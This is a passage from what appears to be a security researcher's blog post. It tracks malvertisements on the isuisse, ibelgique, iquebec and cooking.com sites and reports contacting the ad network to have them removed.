Does this mean they have started the cleanup phase, that they finally decided to move? I have no way to tell. Unfortunately this resolves only part of the problem, since the XMRadio and Forex AutoPilot malvertizements are still being displayed on the main portal of isuisse, ibelgique and iquebec.

This time I have also contacted bluemedia, who is in charge of the advertisements of different websites, by telephone and email. So let's pray that these banners are taken down very soon.

<h4>
cooking.com
</h4>
The cooking.com malvertizement - Ref - has been taken down this night. The server returns a 404 error. Another one fixed.
[screenshot]

